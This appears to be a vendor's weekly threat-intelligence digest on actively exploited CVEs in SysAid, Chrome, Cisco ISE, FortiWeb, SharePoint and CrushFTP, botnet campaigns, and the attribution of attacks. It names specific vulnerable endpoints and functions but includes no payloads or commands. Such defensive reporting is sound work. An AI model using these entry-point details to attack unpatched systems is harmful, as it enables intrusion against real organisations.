This week’s threat landscape saw a spike in exploitation attempts across various vectors, driven by delays in releasing or applying critical patches. These gaps left enterprise environments vulnerable to active, ongoing attacks.  

The Cybersecurity and Infrastructure Security Agency (CISA) added eight new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. These include three critical Microsoft flaws, two impacting SysAid On-Prem, and one each in Google Chrome, CrushFTP, and Fortinet FortiWeb - all of which now demand immediate remediation due to confirmed exploitation and proof-of-concept availability. Simultaneously, active exploitation was reported in Cisco ISE and ISE-PIC, where unauthenticated attackers are abusing API flaws to achieve remote code execution as root.

Botnet activity escalated significantly, as EnemyBot, Sysrv-k, Andoryu, and Androxgh0st launched exploitation campaigns against unpatched vulnerabilities in GitLab, Cloud Gateway, and PHP-based applications. Concurrently, IoT-focused botnets like Mirai, BricketBot, Bashlite, and Tsunami intensified attacks on exposed routers, with surge in exploitation attempts on EirD1000 devices enabling rapid lateral propagation across enterprise networks.

Meanwhile, exploitation of Microsoft SharePoint vulnerabilities has been attributed to sophisticated threat actors, including China-based groups Linen Typhoon, Violet Typhoon and Storm-2603, with confirmed malicious activity traced back to as early as July 7, 2025 in parallel, Sekoia reported a financially driven threat actor exploiting a emote code execution vulnerability in Craft CMS to deliver payloads such as a crypto miner, the Mimo Loader, and residential proxyware.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.

CVE-2025-2775
An Improper Restriction of XML External Entity (XXE) Vulnerability in SysAid On-Prem's Checkin processing functionality enables unauthenticated attackers to take over administrator accounts. This flaw, rated with a critical CVSS score of 9.3, affects versions 23.3.40 and earlier. Alarmingly, this XXE vulnerability can also be chained with a separate OS Command injection flaw - CVE-2024-36394, patched in June 2024. According to WatchTowr Labs, the issue is trivially exploitable via a specially crafted HTTP POST request to the /mdm/checkin endpoint. SysAid resolved this vulnerability in version 24.4.60 build 16. Due to its high impact and the availability of proof-of-concept, this vulnerability has been added to the CISA's Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-2776
An Improper Restriction of XML External Entity Reference Vulnerability in the SysAid On-Prem in the Server URL processing functionality enables administrator account takeover. This flaw, rated with a critical CVSS score of 9.3, affects versions 23.3.40 and earlier. Alarmingly, this XXE vulnerability can also be chained with a separate OS Command injection flaw CVE-2024-36394, patched in June 2024. According to WatchTowr Labs, the issue is trivially exploitable via a specially crafted HTTP POST request to the /mdm/checkin endpoint. SysAid resolved this vulnerability in version 24.4.60 build 16. Due to its high impact and the availability of proof-of-concept, this vulnerability has been added to the CISA KEV catalog.

CVE-2025-6558
An Improper Input Validation Vulnerability in Google Chrome has been identified that allows remote attackers to escape the browser sandbox via a specially crafted HTML page. Discovered by Google's Threat Analysis Group, the flaw resides in Chrome's ANGLE (Almost Native Graphics Layer Engine) and GPU components, where insufficient input validation can be leveraged to manipulate the rendering pipeline and execute arbitrary code. As ANGLE translates WebGL and other graphics API calls into native system instructions, the vulnerability presents a critical attack surface. Google has confirmed active exploitation in the wild. In response, a stable update has been released for Chrome version 138.0.7204.157/.158 across Windows, Mac, and Linux platforms, with automatic rollout in progress. Due to its severity and ongoing exploitation, this vulnerability has been added to CISA KEV catalog reinforcing the urgent need for users to apply the update immediately.

CVE-2025-20281, CVE-2025-20282 and CVE-2025-20337
Cisco has updated its security advisory to confirm active exploitation of multiple critical vulnerabilities affecting its Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). CVE-2025-20281 and CVE-2025-20337 stem from weaknesses in a specific API, which could allow remote attackers to execute arbitrary code on the underlying operating system with root privileges simply by sending a crafted API request.  

Meanwhile, CVE-2025-20282 involves an internal API flaw that allows attackers to upload and execute arbitrary files on the system, again as root, by exploiting insufficient validation mechanisms. All three vulnerabilities are remotely exploitable without authentication, significantly raising the threat level for unpatched instances, especially in environments that require strict compliance or handle sensitive operations.  Cisco urges immediate patching to mitigate the threat.

CVE-2025-25257
An SQL Injection Vulnerability in Fortinet FortiWeb allows unauthenticated attackers to execute arbitrary SQL commands via crafted HTTP/HTTPS requests. With a critical CVSS Score of 9.8, this flaw affects versions 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, and below 7.0.10. According to WatchTowr Labs, the issue originates from the get_fabric_user_by_token function in the Fabric Connector component, accessible through multiple API endpoints. Fortinet has released patches in versions 7.6.4, 7.4.8, 7.2.11, and 7.0.11. Users are urged to update immediately or disable the HTTP/HTTPS admin interface as a temporary workaround. Proof of concept is publicly available, and the flaw is listed in the CISA KEV catalog due to active exploitation.

CVE-2025-49704
A Code Injection Vulnerability in the Microsoft SharePoint, affecting SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016, allows authorized attackers to execute arbitrary code over a network. According to Microsoft, this flaw can be chained with CVE-2025-49706 to escalate impact. Microsoft also noted that the patch for CVE-2025-53770 includes more robust protections than the fix for CVE-2025-49704. Cybersecurity firm Eye Security uncovered an active, large-scale exploitation campaign, dubbed "ToolShell", in which unauthenticated attackers are leveraging the CVE-2025-49704 and CVE-2025-49706 chain to take full control of on-premises SharePoint Servers globally. CISA has added this vulnerability to its KEV catalog, highlighting the need for urgent patching.

CVE-2025-49706
An Improper Authentication Vulnerability in the Microsoft SharePoint, affecting SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016, allows an authorized attacker to perform spoofing over a network. Successful exploitation may lead to unauthorized viewing of sensitive data and modification of exposed information. According to Microsoft, this flaw can be chained with CVE-2025-49704 to escalate its impact, and the patch for CVE-2025-53771 includes more robust protections than the fix for CVE-2025-49706. Cybersecurity firm Eye Security has observed this vulnerability being leveraged in an active, large-scale exploitation campaign dubbed "ToolShell," where unauthenticated attackers are exploiting the CVE-2025-49704 and CVE-2025-49706 chain to gain full control over on-premises SharePoint servers globally. In response, CISA has added this vulnerability to its KEV catalog urging immediate remediation.

CVE-2025-53770
A Deserialization of Untrusted Data Vulnerability in Microsoft SharePoint allows unauthorized attackers to execute arbitrary code over a network. The flaw affects SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Enterprise Server 2016. According to Microsoft, the patch for CVE-2025-53770 offers more comprehensive protections compared to the fix for CVE-2025-49704. This vulnerability has been exploited as a zero-day in the wild and was added to the CISA KEV catalog, urging organizations to apply security updates without delay.

CVE-2025-54309
An Unprotected Alternate Channel Vulnerability in CrushFTP allows remote attackers to gain administrative access via HTTPS when the DMZ proxy feature is disabled, due to improper AS2 validation. The flaw impacts CrushFTP versions 10 before 10.8.5 and 11 before 11.3.4_23. Patched versions 11.3.4_26 and 10.8.5_12 - were released on July 18, 2025. CrushFTP confirmed detecting in-the-wild exploitation of this zero-day on the same day, though it may have been weaponized earlier. CISA added this vulnerability to its KEV catalog, highlighting its severity.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-32432
According to Sekoia, a financially motivated threat actor has been observed exploiting CVE-2025-32432 - a critical remote code execution vulnerability in CraftCMS, to deploy a series of malicious payloads, including the Mimo Loader, a cryptocurrency miner, and residential proxyware. This flaw was originally disclosed by Orange Cyberdefense SensePost after it was seen actively exploited as early as February 2025. The attackers leveraged this vulnerability to gain unauthorized access to targeted systems and install a web shell for persistent remote control. The deployed Mimo Loader was then used to drop XMRig for cryptomining and IPRoyal proxyware to hijack the victim's internet bandwidth leveraging both cryptojacking and proxyjacking techniques for financial gain. Sekoia attributed the exploitation to a Turkish IP address (85.106.113[.]168) and linked the activity to Mimo threat actor, believed to be based in Turkey.

Microsoft Links SharePoint Exploits to Chinese APTs
Microsoft has officially attributed the recent exploitation of vulnerabilities in internet-facing SharePoint Server instances to three China-based threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The activity, first observed as early as July 7 2025, aligns with earlier threat intelligence reports. Linen Typhoon (aka APT27 or Emissary Panda) has a long history of cyberespionage using tools like SysUpdate and PlugX. Violet Typhoon (aka APT31) has been active since 2015, previously targeting countries such as the U.S., Finland, and Czechia. Storm-2603, meanwhile, has been linked to both Warlock and LockBit ransomware campaigns. Microsoft warns that with the growing adoption of these exploits, attackers are likely to continue targeting unpatched SharePoint systems. To counter this threat, organizations are advised to deploy and configure the Antimalware Scan Interface (AMSI) in Full Mode and enable endpoint protection like Microsoft Defender Antivirus across all on-premise SharePoint environments.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/07/20/microsoft-releases-guidance-exploitation-sharepoint-vulnerability-cve-2025-53770  
2. https://www.cisa.gov/news-events/alerts/2025/07/22/cisa-adds-four-known-exploited-vulnerabilities-catalog  
3. https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/  
4. https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/  
5. https://research.eye.security/sharepoint-under-siege/  
6. https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/  
7. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6  
8. https://www.cisa.gov/news-events/alerts/2025/07/18/cisa-adds-one-known-exploited-vulnerability-catalog